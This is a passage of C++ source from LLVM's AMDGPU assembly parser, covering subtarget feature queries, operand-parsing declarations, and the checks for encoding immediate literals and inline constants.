AMDGPUAsmParser(const MCSubtargetInfo &STI, MCAsmParser &_Parser,
const MCInstrInfo &MII,
const MCTargetOptions &Options)
: MCTargetAsmParser(Options, STI, MII), Parser(_Parser) {
MCAsmParserExtension::Initialize(Parser);
if (getFeatureBits().none()) {
// Set default features.
copySTI().ToggleFeature("southern-islands");
}
setAvailableFeatures(ComputeAvailableFeatures(getFeatureBits()));
{
// TODO: make those pre-defined variables read-only.
// Currently there is none suitable machinery in the core llvm-mc for this.
// MCSymbol::isRedefinable is intended for another purpose, and
// AsmParser::parseDirectiveSet() cannot be specialized for specific target.
AMDGPU::IsaVersion ISA = AMDGPU::getIsaVersion(getSTI().getCPU());
MCContext &Ctx = getContext();
// Symbol names differ by ABI: .amdgcn.* for HSA v3+, .option.* legacy.
if (ISA.Major >= 6 && isHsaAbiVersion3AndAbove(&getSTI())) {
MCSymbol *Sym =
Ctx.getOrCreateSymbol(Twine(".amdgcn.gfx_generation_number"));
Sym->setVariableValue(MCConstantExpr::create(ISA.Major, Ctx));
Sym = Ctx.getOrCreateSymbol(Twine(".amdgcn.gfx_generation_minor"));
Sym->setVariableValue(MCConstantExpr::create(ISA.Minor, Ctx));
Sym = Ctx.getOrCreateSymbol(Twine(".amdgcn.gfx_generation_stepping"));
Sym->setVariableValue(MCConstantExpr::create(ISA.Stepping, Ctx));
} else {
MCSymbol *Sym =
Ctx.getOrCreateSymbol(Twine(".option.machine_version_major"));
Sym->setVariableValue(MCConstantExpr::create(ISA.Major, Ctx));
Sym = Ctx.getOrCreateSymbol(Twine(".option.machine_version_minor"));
Sym->setVariableValue(MCConstantExpr::create(ISA.Minor, Ctx));
Sym = Ctx.getOrCreateSymbol(Twine(".option.machine_version_stepping"));
Sym->setVariableValue(MCConstantExpr::create(ISA.Stepping, Ctx));
}
if (ISA.Major >= 6 && isHsaAbiVersion3AndAbove(&getSTI())) {
initializeGprCountSymbol(IS_VGPR);
initializeGprCountSymbol(IS_SGPR);
} else
KernelScope.initialize(getContext());
}
}
// Subtarget capability / generation queries, all thin wrappers over the
// AMDGPU:: utility predicates for the current MCSubtargetInfo.
bool hasMIMG_R128() const {
return AMDGPU::hasMIMG_R128(getSTI());
}
bool hasPackedD16() const {
return AMDGPU::hasPackedD16(getSTI());
}
bool hasGFX10A16() const {
return AMDGPU::hasGFX10A16(getSTI());
}
bool hasG16() const { return AMDGPU::hasG16(getSTI()); }
bool isSI() const {
return AMDGPU::isSI(getSTI());
}
bool isCI() const {
return AMDGPU::isCI(getSTI());
}
bool isVI() const {
return AMDGPU::isVI(getSTI());
}
bool isGFX9() const {
return AMDGPU::isGFX9(getSTI());
}
bool isGFX90A() const {
return AMDGPU::isGFX90A(getSTI());
}
bool isGFX9Plus() const {
return AMDGPU::isGFX9Plus(getSTI());
}
bool isGFX10() const {
return AMDGPU::isGFX10(getSTI());
}
bool isGFX10Plus() const { return AMDGPU::isGFX10Plus(getSTI()); }
bool isGFX10_BEncoding() const {
return AMDGPU::isGFX10_BEncoding(getSTI());
}
// Feature-bit queries.
bool hasInv2PiInlineImm() const {
return getFeatureBits()[AMDGPU::FeatureInv2PiInlineImm];
}
bool hasFlatOffsets() const {
return getFeatureBits()[AMDGPU::FeatureFlatInstOffsets];
}
bool hasArchitectedFlatScratch() const {
return getFeatureBits()[AMDGPU::FeatureArchitectedFlatScratch];
}
// SGPR102-105 availability depends on the generation.
bool hasSGPR102_SGPR103() const {
return !isVI() && !isGFX9();
}
bool hasSGPR104_SGPR105() const { return isGFX10Plus(); }
bool hasIntClamp() const {
return getFeatureBits()[AMDGPU::FeatureIntClamp];
}
AMDGPUTargetStreamer &getTargetStreamer() {
MCTargetStreamer &TS = *getParser().getStreamer().getTargetStreamer();
return static_cast<AMDGPUTargetStreamer &>(TS);
}
const MCRegisterInfo *getMRI() const {
// We need this const_cast because for some reason getContext() is not const
// in MCAsmParser.
return const_cast<AMDGPUAsmParser*>(this)->getContext().getRegisterInfo();
}
const MCInstrInfo *getMII() const {
return &MII;
}
const FeatureBitset &getFeatureBits() const {
return getSTI().getFeatureBits();
}
// Forced-encoding state set from mnemonic suffixes, consulted during
// instruction matching.
void setForcedEncodingSize(unsigned Size) { ForcedEncodingSize = Size; }
void setForcedDPP(bool ForceDPP_) { ForcedDPP = ForceDPP_; }
void setForcedSDWA(bool ForceSDWA_) { ForcedSDWA = ForceSDWA_; }
unsigned getForcedEncodingSize() const { return ForcedEncodingSize; }
bool isForcedVOP3() const { return ForcedEncodingSize == 64; }
bool isForcedDPP() const { return ForcedDPP; }
bool isForcedSDWA() const { return ForcedSDWA; }
ArrayRef<unsigned> getMatchedVariants() const;
StringRef getMatchedVariantName() const;
// MCTargetAsmParser entry points and operand-parsing declarations;
// definitions live elsewhere in this file.
std::unique_ptr<AMDGPUOperand> parseRegister(bool RestoreOnFailure = false);
bool ParseRegister(unsigned &RegNo, SMLoc &StartLoc, SMLoc &EndLoc,
bool RestoreOnFailure);
bool ParseRegister(unsigned &RegNo, SMLoc &StartLoc, SMLoc &EndLoc) override;
OperandMatchResultTy tryParseRegister(unsigned &RegNo, SMLoc &StartLoc,
SMLoc &EndLoc) override;
unsigned checkTargetMatchPredicate(MCInst &Inst) override;
unsigned validateTargetOperandClass(MCParsedAsmOperand &Op,
unsigned Kind) override;
bool MatchAndEmitInstruction(SMLoc IDLoc, unsigned &Opcode,
OperandVector &Operands, MCStreamer &Out,
uint64_t &ErrorInfo,
bool MatchingInlineAsm) override;
bool ParseDirective(AsmToken DirectiveID) override;
OperandMatchResultTy parseOperand(OperandVector &Operands, StringRef Mnemonic,
OperandMode Mode = OperandMode_Default);
StringRef parseMnemonicSuffix(StringRef Name);
bool ParseInstruction(ParseInstructionInfo &Info, StringRef Name,
SMLoc NameLoc, OperandVector &Operands) override;
//bool ProcessInstruction(MCInst &Inst);
// Generic "prefix:value" and named-bit operand parsers used by many
// instruction formats; ConvertResult may post-process the parsed value.
OperandMatchResultTy parseIntWithPrefix(const char *Prefix, int64_t &Int);
OperandMatchResultTy
parseIntWithPrefix(const char *Prefix, OperandVector &Operands,
AMDGPUOperand::ImmTy ImmTy = AMDGPUOperand::ImmTyNone,
bool (*ConvertResult)(int64_t &) = nullptr);
OperandMatchResultTy
parseOperandArrayWithPrefix(const char *Prefix,
OperandVector &Operands,
AMDGPUOperand::ImmTy ImmTy = AMDGPUOperand::ImmTyNone,
bool (*ConvertResult)(int64_t&) = nullptr);
OperandMatchResultTy
parseNamedBit(StringRef Name, OperandVector &Operands,
AMDGPUOperand::ImmTy ImmTy = AMDGPUOperand::ImmTyNone);
OperandMatchResultTy parseCPol(OperandVector &Operands);
OperandMatchResultTy parseStringWithPrefix(StringRef Prefix,
StringRef &Value,
SMLoc &StringLoc);
// Modifier-detection helpers used to disambiguate expressions from
// operand modifiers during parsing.
bool isModifier();
bool isOperandModifier(const AsmToken &Token, const AsmToken &NextToken) const;
bool isRegOrOperandModifier(const AsmToken &Token, const AsmToken &NextToken) const;
bool isNamedOperandModifier(const AsmToken &Token, const AsmToken &NextToken) const;
bool isOpcodeModifierWithVal(const AsmToken &Token, const AsmToken &NextToken) const;
bool parseSP3NegModifier();
OperandMatchResultTy parseImm(OperandVector &Operands, bool HasSP3AbsModifier = false);
OperandMatchResultTy parseReg(OperandVector &Operands);
OperandMatchResultTy parseRegOrImm(OperandVector &Operands, bool HasSP3AbsMod = false);
OperandMatchResultTy parseRegOrImmWithFPInputMods(OperandVector &Operands, bool AllowImm = true);
OperandMatchResultTy parseRegOrImmWithIntInputMods(OperandVector &Operands, bool AllowImm = true);
OperandMatchResultTy parseRegWithFPInputMods(OperandVector &Operands);
OperandMatchResultTy parseRegWithIntInputMods(OperandVector &Operands);
OperandMatchResultTy parseVReg32OrOff(OperandVector &Operands);
// Buffer-format (dfmt/nfmt/ufmt) parsing helpers.
OperandMatchResultTy parseDfmtNfmt(int64_t &Format);
OperandMatchResultTy parseUfmt(int64_t &Format);
OperandMatchResultTy parseSymbolicSplitFormat(StringRef FormatStr, SMLoc Loc, int64_t &Format);
OperandMatchResultTy parseSymbolicUnifiedFormat(StringRef FormatStr, SMLoc Loc, int64_t &Format);
OperandMatchResultTy parseFORMAT(OperandVector &Operands);
OperandMatchResultTy parseSymbolicOrNumericFormat(int64_t &Format);
OperandMatchResultTy parseNumericFormat(int64_t &Format);
bool tryParseFmt(const char *Pref, int64_t MaxVal, int64_t &Val);
bool matchDfmtNfmt(int64_t &Dfmt, int64_t &Nfmt, StringRef FormatStr, SMLoc Loc);
// DS/EXP instruction converters.
void cvtDSOffset01(MCInst &Inst, const OperandVector &Operands);
void cvtDS(MCInst &Inst, const OperandVector &Operands) { cvtDSImpl(Inst, Operands, false); }
void cvtDSGds(MCInst &Inst, const OperandVector &Operands) { cvtDSImpl(Inst, Operands, true); }
void cvtExp(MCInst &Inst, const OperandVector &Operands);
bool parseCnt(int64_t &IntVal);
OperandMatchResultTy parseSWaitCntOps(OperandVector &Operands);
OperandMatchResultTy parseHwreg(OperandVector &Operands);
private:
struct OperandInfoTy {
SMLoc Loc;
int64_t Id;
bool IsSymbolic = false;
bool IsDefined = false;
OperandInfoTy(int64_t Id_) : Id(Id_) {}
};
bool parseSendMsgBody(OperandInfoTy &Msg, OperandInfoTy &Op, OperandInfoTy &Stream);
bool validateSendMsg(const OperandInfoTy &Msg,
const OperandInfoTy &Op,
const OperandInfoTy &Stream);
bool parseHwregBody(OperandInfoTy &HwReg,
OperandInfoTy &Offset,
OperandInfoTy &Width);
bool validateHwreg(const OperandInfoTy &HwReg,
const OperandInfoTy &Offset,
const OperandInfoTy &Width);
SMLoc getFlatOffsetLoc(const OperandVector &Operands) const;
SMLoc getSMEMOffsetLoc(const OperandVector &Operands) const;
SMLoc getOperandLoc(std::function<bool(const AMDGPUOperand&)> Test,
const OperandVector &Operands) const;
SMLoc getImmLoc(AMDGPUOperand::ImmTy Type, const OperandVector &Operands) const;
SMLoc getRegLoc(unsigned Reg, const OperandVector &Operands) const;
SMLoc getLitLoc(const OperandVector &Operands) const;
SMLoc getConstLoc(const OperandVector &Operands) const;
bool validateInstruction(const MCInst &Inst, const SMLoc &IDLoc, const OperandVector &Operands);
bool validateFlatOffset(const MCInst &Inst, const OperandVector &Operands);
bool validateSMEMOffset(const MCInst &Inst, const OperandVector &Operands);
bool validateSOPLiteral(const MCInst &Inst) const;
bool validateConstantBusLimitations(const MCInst &Inst, const OperandVector &Operands);
bool validateEarlyClobberLimitations(const MCInst &Inst, const OperandVector &Operands);
bool validateIntClampSupported(const MCInst &Inst);
bool validateMIMGAtomicDMask(const MCInst &Inst);
bool validateMIMGGatherDMask(const MCInst &Inst);
bool validateMovrels(const MCInst &Inst, const OperandVector &Operands);
bool validateMIMGDataSize(const MCInst &Inst);
bool validateMIMGAddrSize(const MCInst &Inst);
bool validateMIMGD16(const MCInst &Inst);
bool validateMIMGDim(const MCInst &Inst);
bool validateMIMGMSAA(const MCInst &Inst);
bool validateOpSel(const MCInst &Inst);
bool validateDPP(const MCInst &Inst, const OperandVector &Operands);
bool validateVccOperand(unsigned Reg) const;
bool validateVOPLiteral(const MCInst &Inst, const OperandVector &Operands);
bool validateMAIAccWrite(const MCInst &Inst, const OperandVector &Operands);
bool validateMFMA(const MCInst &Inst, const OperandVector &Operands);
bool validateAGPRLdSt(const MCInst &Inst) const;
bool validateVGPRAlign(const MCInst &Inst) const;
bool validateGWS(const MCInst &Inst, const OperandVector &Operands);
bool validateDivScale(const MCInst &Inst);
bool validateCoherencyBits(const MCInst &Inst, const OperandVector &Operands,
const SMLoc &IDLoc);
Optional<StringRef> validateLdsDirect(const MCInst &Inst);
unsigned getConstantBusLimit(unsigned Opcode) const;
bool usesConstantBus(const MCInst &Inst, unsigned OpIdx);
bool isInlineConstant(const MCInst &Inst, unsigned OpIdx) const;
unsigned findImplicitSGPRReadInVOP(const MCInst &Inst) const;
bool isSupportedMnemo(StringRef Mnemo,
const FeatureBitset &FBS);
bool isSupportedMnemo(StringRef Mnemo,
const FeatureBitset &FBS,
ArrayRef<unsigned> Variants);
bool checkUnsupportedInstruction(StringRef Name, const SMLoc &IDLoc);
bool isId(const StringRef Id) const;
bool isId(const AsmToken &Token, const StringRef Id) const;
bool isToken(const AsmToken::TokenKind Kind) const;
bool trySkipId(const StringRef Id);
bool trySkipId(const StringRef Pref, const StringRef Id);
bool trySkipId(const StringRef Id, const AsmToken::TokenKind Kind);
bool trySkipToken(const AsmToken::TokenKind Kind);
bool skipToken(const AsmToken::TokenKind Kind, const StringRef ErrMsg);
bool parseString(StringRef &Val, const StringRef ErrMsg = "expected a string");
bool parseId(StringRef &Val, const StringRef ErrMsg = "");
void peekTokens(MutableArrayRef<AsmToken> Tokens);
AsmToken::TokenKind getTokenKind() const;
bool parseExpr(int64_t &Imm, StringRef Expected = "");
bool parseExpr(OperandVector &Operands);
StringRef getTokenStr() const;
AsmToken peekToken();
AsmToken getToken() const;
SMLoc getLoc() const;
void lex();
public:
void onBeginOfFile() override;
OperandMatchResultTy parseOptionalOperand(OperandVector &Operands);
OperandMatchResultTy parseOptionalOpr(OperandVector &Operands);
OperandMatchResultTy parseExpTgt(OperandVector &Operands);
OperandMatchResultTy parseSendMsgOp(OperandVector &Operands);
OperandMatchResultTy parseInterpSlot(OperandVector &Operands);
OperandMatchResultTy parseInterpAttr(OperandVector &Operands);
OperandMatchResultTy parseSOppBrTarget(OperandVector &Operands);
OperandMatchResultTy parseBoolReg(OperandVector &Operands);
bool parseSwizzleOperand(int64_t &Op,
const unsigned MinVal,
const unsigned MaxVal,
const StringRef ErrMsg,
SMLoc &Loc);
bool parseSwizzleOperands(const unsigned OpNum, int64_t* Op,
const unsigned MinVal,
const unsigned MaxVal,
const StringRef ErrMsg);
OperandMatchResultTy parseSwizzleOp(OperandVector &Operands);
bool parseSwizzleOffset(int64_t &Imm);
bool parseSwizzleMacro(int64_t &Imm);
bool parseSwizzleQuadPerm(int64_t &Imm);
bool parseSwizzleBitmaskPerm(int64_t &Imm);
bool parseSwizzleBroadcast(int64_t &Imm);
bool parseSwizzleSwap(int64_t &Imm);
bool parseSwizzleReverse(int64_t &Imm);
OperandMatchResultTy parseGPRIdxMode(OperandVector &Operands);
int64_t parseGPRIdxMacro();
void cvtMubuf(MCInst &Inst, const OperandVector &Operands) { cvtMubufImpl(Inst, Operands, false); }
void cvtMubufAtomic(MCInst &Inst, const OperandVector &Operands) { cvtMubufImpl(Inst, Operands, true); }
void cvtMubufLds(MCInst &Inst, const OperandVector &Operands) { cvtMubufImpl(Inst, Operands, false, true); }
void cvtMtbuf(MCInst &Inst, const OperandVector &Operands);
AMDGPUOperand::Ptr defaultCPol() const;
AMDGPUOperand::Ptr defaultSMRDOffset8() const;
AMDGPUOperand::Ptr defaultSMEMOffset() const;
AMDGPUOperand::Ptr defaultSMRDLiteralOffset() const;
AMDGPUOperand::Ptr defaultFlatOffset() const;
OperandMatchResultTy parseOModOperand(OperandVector &Operands);
void cvtVOP3(MCInst &Inst, const OperandVector &Operands,
OptionalImmIndexMap &OptionalIdx);
void cvtVOP3OpSel(MCInst &Inst, const OperandVector &Operands);
void cvtVOP3(MCInst &Inst, const OperandVector &Operands);
void cvtVOP3P(MCInst &Inst, const OperandVector &Operands);
void cvtVOP3P(MCInst &Inst, const OperandVector &Operands,
OptionalImmIndexMap &OptionalIdx);
void cvtVOP3Interp(MCInst &Inst, const OperandVector &Operands);
void cvtMIMG(MCInst &Inst, const OperandVector &Operands,
bool IsAtomic = false);
void cvtMIMGAtomic(MCInst &Inst, const OperandVector &Operands);
void cvtIntersectRay(MCInst &Inst, const OperandVector &Operands);
void cvtSMEMAtomic(MCInst &Inst, const OperandVector &Operands);
bool parseDimId(unsigned &Encoding);
OperandMatchResultTy parseDim(OperandVector &Operands);
OperandMatchResultTy parseDPP8(OperandVector &Operands);
OperandMatchResultTy parseDPPCtrl(OperandVector &Operands);
bool isSupportedDPPCtrl(StringRef Ctrl, const OperandVector &Operands);
int64_t parseDPPCtrlSel(StringRef Ctrl);
int64_t parseDPPCtrlPerm();
AMDGPUOperand::Ptr defaultRowMask() const;
AMDGPUOperand::Ptr defaultBankMask() const;
AMDGPUOperand::Ptr defaultBoundCtrl() const;
AMDGPUOperand::Ptr defaultFI() const;
void cvtDPP(MCInst &Inst, const OperandVector &Operands, bool IsDPP8 = false);
void cvtDPP8(MCInst &Inst, const OperandVector &Operands) { cvtDPP(Inst, Operands, true); }
OperandMatchResultTy parseSDWASel(OperandVector &Operands, StringRef Prefix,
AMDGPUOperand::ImmTy Type);
OperandMatchResultTy parseSDWADstUnused(OperandVector &Operands);
void cvtSdwaVOP1(MCInst &Inst, const OperandVector &Operands);
void cvtSdwaVOP2(MCInst &Inst, const OperandVector &Operands);
void cvtSdwaVOP2b(MCInst &Inst, const OperandVector &Operands);
void cvtSdwaVOP2e(MCInst &Inst, const OperandVector &Operands);
void cvtSdwaVOPC(MCInst &Inst, const OperandVector &Operands);
void cvtSDWA(MCInst &Inst, const OperandVector &Operands,
uint64_t BasicInstType,
bool SkipDstVcc = false,
bool SkipSrcVcc = false);
AMDGPUOperand::Ptr defaultBLGP() const;
AMDGPUOperand::Ptr defaultCBSZ() const;
AMDGPUOperand::Ptr defaultABID() const;
OperandMatchResultTy parseEndpgmOp(OperandVector &Operands);
AMDGPUOperand::Ptr defaultEndpgmImmOperands() const;
};
// Table entry describing one optional instruction operand: its assembly
// name, the immediate type it maps to, whether it is a bare named bit
// (no value), and an optional value-conversion callback.
struct OptionalOperand {
const char *Name;
AMDGPUOperand::ImmTy Type;
bool IsBit;
bool (*ConvertResult)(int64_t&);
};
} // end anonymous namespace
// Returns the IEEE semantics matching an operand size in bytes.
// May be called with an integer type of equivalent bitwidth.
static const fltSemantics *getFltSemantics(unsigned Size) {
  switch (Size) {
  case 2:
    return &APFloat::IEEEhalf();
  case 4:
    return &APFloat::IEEEsingle();
  case 8:
    return &APFloat::IEEEdouble();
  default:
    llvm_unreachable("unsupported fp type");
  }
}
// Convenience overload: derive the byte size from the machine value type.
static const fltSemantics *getFltSemantics(MVT VT) {
  const unsigned SizeInBytes = VT.getSizeInBits() / 8;
  return getFltSemantics(SizeInBytes);
}
// Maps an MCOI operand-type tag to the IEEE semantics of the literal it
// carries: 32-bit operand kinds -> single, 64-bit -> double, 16-bit and
// packed-16 kinds -> half. Aborts on any other operand type.
static const fltSemantics *getOpFltSemantics(uint8_t OperandType) {
switch (OperandType) {
case AMDGPU::OPERAND_REG_IMM_INT32:
case AMDGPU::OPERAND_REG_IMM_FP32:
case AMDGPU::OPERAND_REG_IMM_FP32_DEFERRED:
case AMDGPU::OPERAND_REG_INLINE_C_INT32:
case AMDGPU::OPERAND_REG_INLINE_C_FP32:
case AMDGPU::OPERAND_REG_INLINE_AC_INT32:
case AMDGPU::OPERAND_REG_INLINE_AC_FP32:
case AMDGPU::OPERAND_REG_INLINE_C_V2FP32:
case AMDGPU::OPERAND_REG_IMM_V2FP32:
case AMDGPU::OPERAND_REG_INLINE_C_V2INT32:
case AMDGPU::OPERAND_REG_IMM_V2INT32:
case AMDGPU::OPERAND_KIMM32:
return &APFloat::IEEEsingle();
case AMDGPU::OPERAND_REG_IMM_INT64:
case AMDGPU::OPERAND_REG_IMM_FP64:
case AMDGPU::OPERAND_REG_INLINE_C_INT64:
case AMDGPU::OPERAND_REG_INLINE_C_FP64:
case AMDGPU::OPERAND_REG_INLINE_AC_FP64:
return &APFloat::IEEEdouble();
case AMDGPU::OPERAND_REG_IMM_INT16:
case AMDGPU::OPERAND_REG_IMM_FP16:
case AMDGPU::OPERAND_REG_IMM_FP16_DEFERRED:
case AMDGPU::OPERAND_REG_INLINE_C_INT16:
case AMDGPU::OPERAND_REG_INLINE_C_FP16:
case AMDGPU::OPERAND_REG_INLINE_C_V2INT16:
case AMDGPU::OPERAND_REG_INLINE_C_V2FP16:
case AMDGPU::OPERAND_REG_INLINE_AC_INT16:
case AMDGPU::OPERAND_REG_INLINE_AC_FP16:
case AMDGPU::OPERAND_REG_INLINE_AC_V2INT16:
case AMDGPU::OPERAND_REG_INLINE_AC_V2FP16:
case AMDGPU::OPERAND_REG_IMM_V2INT16:
case AMDGPU::OPERAND_REG_IMM_V2FP16:
case AMDGPU::OPERAND_KIMM16:
return &APFloat::IEEEhalf();
default:
llvm_unreachable("unsupported fp type");
}
}
//===----------------------------------------------------------------------===//
// Operand
//===----------------------------------------------------------------------===//
// Converts FPLiteral in place to the semantics of VT and reports whether the
// conversion is acceptable: precision loss is tolerated, but a value change
// caused by overflow or underflow is not.
static bool canLosslesslyConvertToFPType(APFloat &FPLiteral, MVT VT) {
  bool IsInexact;
  const APFloat::opStatus Status = FPLiteral.convert(
      *getFltSemantics(VT), APFloat::rmNearestTiesToEven, &IsInexact);
  if (Status == APFloat::opOK)
    return true;
  const bool OutOfRange =
      (Status & (APFloat::opOverflow | APFloat::opUnderflow)) != 0;
  return !(IsInexact && OutOfRange);
}
// A value can be safely truncated to Size bits if it fits either as a
// signed or as an unsigned Size-bit integer.
static bool isSafeTruncation(int64_t Val, unsigned Size) {
  const bool FitsSigned = isIntN(Size, Val);
  const bool FitsUnsigned = isUIntN(Size, Val);
  return FitsSigned || FitsUnsigned;
}
// 16-bit inline-literal check. f16/v2f16 operands accept any inlinable
// 16-bit literal; for i16 operands FP immediate values are broken in
// hardware, so only integer inline literals are allowed.
static bool isInlineableLiteralOp16(int64_t Val, MVT VT, bool HasInv2Pi) {
  if (VT.getScalarType() != MVT::i16)
    return AMDGPU::isInlinableLiteral16(Val, HasInv2Pi);
  return isInlinableIntLiteral(Val);
}
// Returns true if this operand can be encoded as an inline constant for an
// operand of machine type 'type'. Handles named inline values, FP literal
// tokens (converted to the target semantics first) and integer literal
// tokens (truncated to the operand width first).
bool AMDGPUOperand::isInlinableImm(MVT type) const {
// This is a hack to enable named inline values like
// shared_base with both 32-bit and 64-bit operands.
// Note that these values are defined as
// 32-bit operands only.
if (isInlineValue()) {
return true;
}
if (!isImmTy(ImmTyNone)) {
// Only plain immediates are inlinable (e.g. "clamp" attribute is not)
return false;
}
// TODO: We should avoid using host float here. It would be better to
// check the float bit values which is what a few other places do.
// We've had bot failures before due to weird NaN support on mips hosts.
APInt Literal(64, Imm.Val);
if (Imm.IsFPImm) { // We got fp literal token
if (type == MVT::f64 || type == MVT::i64) { // Expected 64-bit operand
return AMDGPU::isInlinableLiteral64(Imm.Val,
AsmParser->hasInv2PiInlineImm());
}
// Narrower operand: convert the double literal to the operand's
// semantics and reject if the conversion changes the value.
APFloat FPLiteral(APFloat::IEEEdouble(), APInt(64, Imm.Val));
if (!canLosslesslyConvertToFPType(FPLiteral, type))
return false;
if (type.getScalarSizeInBits() == 16) {
return isInlineableLiteralOp16(
static_cast<int16_t>(FPLiteral.bitcastToAPInt().getZExtValue()),
type, AsmParser->hasInv2PiInlineImm());
}
// Check if single precision literal is inlinable
return AMDGPU::isInlinableLiteral32(
static_cast<int32_t>(FPLiteral.bitcastToAPInt().getZExtValue()),
AsmParser->hasInv2PiInlineImm());
}
// We got int literal token.
if (type == MVT::f64 || type == MVT::i64) { // Expected 64-bit operand
return AMDGPU::isInlinableLiteral64(Imm.Val,
AsmParser->hasInv2PiInlineImm());
}
if (!isSafeTruncation(Imm.Val, type.getScalarSizeInBits())) {
return false;
}
if (type.getScalarSizeInBits() == 16) {
return isInlineableLiteralOp16(
static_cast<int16_t>(Literal.getLoBits(16).getSExtValue()),
type, AsmParser->hasInv2PiInlineImm());
}
return AMDGPU::isInlinableLiteral32(
static_cast<int32_t>(Literal.getLoBits(32).getZExtValue()),
AsmParser->hasInv2PiInlineImm());
}
// Returns true if this immediate can be encoded as a (non-inline) literal
// for an operand of machine type 'type'. Integer tokens must truncate
// safely; FP tokens must convert losslessly to the operand's FP type, and
// are rejected outright for 64-bit integer operands.
bool AMDGPUOperand::isLiteralImm(MVT type) const {
// Check that this immediate can be added as literal
if (!isImmTy(ImmTyNone)) {
return false;
}
if (!Imm.IsFPImm) {
// We got int literal token.
if (type == MVT::f64 && hasFPModifiers()) {
// Cannot apply fp modifiers to int literals preserving the same semantics
// for VOP1/2/C and VOP3 because of integer truncation. To avoid ambiguity,
// disable these cases.
return false;
}
unsigned Size = type.getSizeInBits();
if (Size == 64)
Size = 32;
// FIXME: 64-bit operands can zero extend, sign extend, or pad zeroes for FP
// types.
return isSafeTruncation(Imm.Val, Size);
}
// We got fp literal token
if (type == MVT::f64) { // Expected 64-bit fp operand
// We would set low 64-bits of literal to zeroes but we accept this literals
return true;
}
if (type == MVT::i64) { // Expected 64-bit int operand
// We don't allow fp literals in 64-bit integer instructions. It is
// unclear how we should encode them.
return false;
}
// We allow fp literals with f16x2 operands assuming that the specified
// literal goes into the lower half and the upper half is zero. We also
// require that the literal may be losslessly converted to f16.
MVT ExpectedType = (type == MVT::v2f16)? MVT::f16 :
(type == MVT::v2i16)? MVT::i16 :
(type == MVT::v2f32)? MVT::f32 : type;
APFloat FPLiteral(APFloat::IEEEdouble(), APInt(64, Imm.Val));
return canLosslesslyConvertToFPType(FPLiteral, ExpectedType);
}
bool AMDGPUOperand::isRegClass(unsigned RCID) const {
return isRegKind() && AsmParser->getMRI()->getRegClass(RCID).contains(getReg());
}
// A VGPR operand that may carry input modifiers: any 32-bit VGPR, or a
// 64-bit VGPR pair on subtargets with 64-bit DPP support.
bool AMDGPUOperand::isVRegWithInputMods() const {
  if (isRegClass(AMDGPU::VGPR_32RegClassID))
    return true;
  // GFX90A allows DPP on 64-bit operands.
  return isRegClass(AMDGPU::VReg_64RegClassID) &&
         AsmParser->getFeatureBits()[AMDGPU::Feature64BitDPP];
}
// SDWA source operand check: VI accepts only 32-bit VGPRs; GFX9+ also
// accepts 32-bit SGPR/VGPR classes and inlinable immediates. Other
// subtargets have no SDWA.
bool AMDGPUOperand::isSDWAOperand(MVT type) const {
  if (AsmParser->isVI())
    return isVReg32();
  if (AsmParser->isGFX9Plus())
    return isRegClass(AMDGPU::VS_32RegClassID) || isInlinableImm(type);
  return false;
}
// Typed convenience wrappers around isSDWAOperand for each SDWA
// source element type.
bool AMDGPUOperand::isSDWAFP16Operand() const {
return isSDWAOperand(MVT::f16);
}
bool AMDGPUOperand::isSDWAFP32Operand() const {
return isSDWAOperand(MVT::f32);
}
bool AMDGPUOperand::isSDWAInt16Operand() const {
return isSDWAOperand(MVT::i16);
}
bool AMDGPUOperand::isSDWAInt32Operand() const {
return isSDWAOperand(MVT::i32);
}
// True if this register can hold a per-lane boolean (condition mask):
// a 64-bit SGPR source in wave64 mode, or a 32-bit one in wave32 mode.
bool AMDGPUOperand::isBoolReg() const {
  // Bind by reference to avoid copying the feature bitset on every call
  // (clang-tidy: performance-unnecessary-copy-initialization).
  const auto &FB = AsmParser->getFeatureBits();
  return isReg() && ((FB[AMDGPU::FeatureWavefrontSize64] && isSCSrcB64()) ||
                     (FB[AMDGPU::FeatureWavefrontSize32] && isSCSrcB32()));
}
// Applies this operand's FP input modifiers to the raw bit pattern of a
// literal: 'abs' clears the sign bit, 'neg' flips it. Size is the operand
// size in bytes (2, 4 or 8).
uint64_t AMDGPUOperand::applyInputFPModifiers(uint64_t Val, unsigned Size) const
{
  assert(isImmTy(ImmTyNone) && Imm.Mods.hasFPModifiers());
  assert(Size == 2 || Size == 4 || Size == 8);
  const uint64_t SignBit = 1ULL << (Size * 8 - 1);
  if (Imm.Mods.Abs)
    Val &= ~SignBit;
  if (Imm.Mods.Neg)
    Val ^= SignBit;
  return Val;
}
// Adds this immediate to Inst. If the target slot is an SI source operand,
// route through addLiteralImmOperand so inline-constant encoding and FP
// input modifiers are handled; otherwise emit the raw value.
// N is unused here — presumably kept for interface parity with the other
// addXxxOperands callbacks; TODO confirm.
void AMDGPUOperand::addImmOperands(MCInst &Inst, unsigned N, bool ApplyModifiers) const {
  if (AMDGPU::isSISrcOperand(AsmParser->getMII()->get(Inst.getOpcode()),
                             Inst.getNumOperands())) {
    // Was 'ApplyModifiers & ...' — bitwise AND on bool operands. Logical
    // AND is equivalent for bools, clearer, and short-circuits.
    addLiteralImmOperand(Inst, Imm.Val,
                         ApplyModifiers &&
                         isImmTy(ImmTyNone) && Imm.Mods.hasFPModifiers());
  } else {
    assert(!isImmTy(ImmTyNone) || !hasModifiers());
    Inst.addOperand(MCOperand::createImm(Imm.Val));
    setImmKindNone();
  }
}
// Encodes Val as the literal/constant operand at the current position of
// Inst. Inline-encodable values are added as-is (immediate kind "const");
// everything else is narrowed to the operand's width and added as a
// literal. FP literal tokens are first converted from the parsed double to
// the operand's FP semantics. ApplyModifiers folds abs/neg into the bits
// before encoding.
void AMDGPUOperand::addLiteralImmOperand(MCInst &Inst, int64_t Val, bool ApplyModifiers) const {
const auto& InstDesc = AsmParser->getMII()->get(Inst.getOpcode());
auto OpNum = Inst.getNumOperands();
// Check that this operand accepts literals
assert(AMDGPU::isSISrcOperand(InstDesc, OpNum));
if (ApplyModifiers) {
assert(AMDGPU::isSISrcFPOperand(InstDesc, OpNum));
const unsigned Size = Imm.IsFPImm ? sizeof(double) : getOperandSize(InstDesc, OpNum);
Val = applyInputFPModifiers(Val, Size);
}
APInt Literal(64, Val);
uint8_t OpTy = InstDesc.OpInfo[OpNum].OperandType;
if (Imm.IsFPImm) { // We got fp literal token
switch (OpTy) {
case AMDGPU::OPERAND_REG_IMM_INT64:
case AMDGPU::OPERAND_REG_IMM_FP64:
case AMDGPU::OPERAND_REG_INLINE_C_INT64:
case AMDGPU::OPERAND_REG_INLINE_C_FP64:
case AMDGPU::OPERAND_REG_INLINE_AC_FP64:
if (AMDGPU::isInlinableLiteral64(Literal.getZExtValue(),
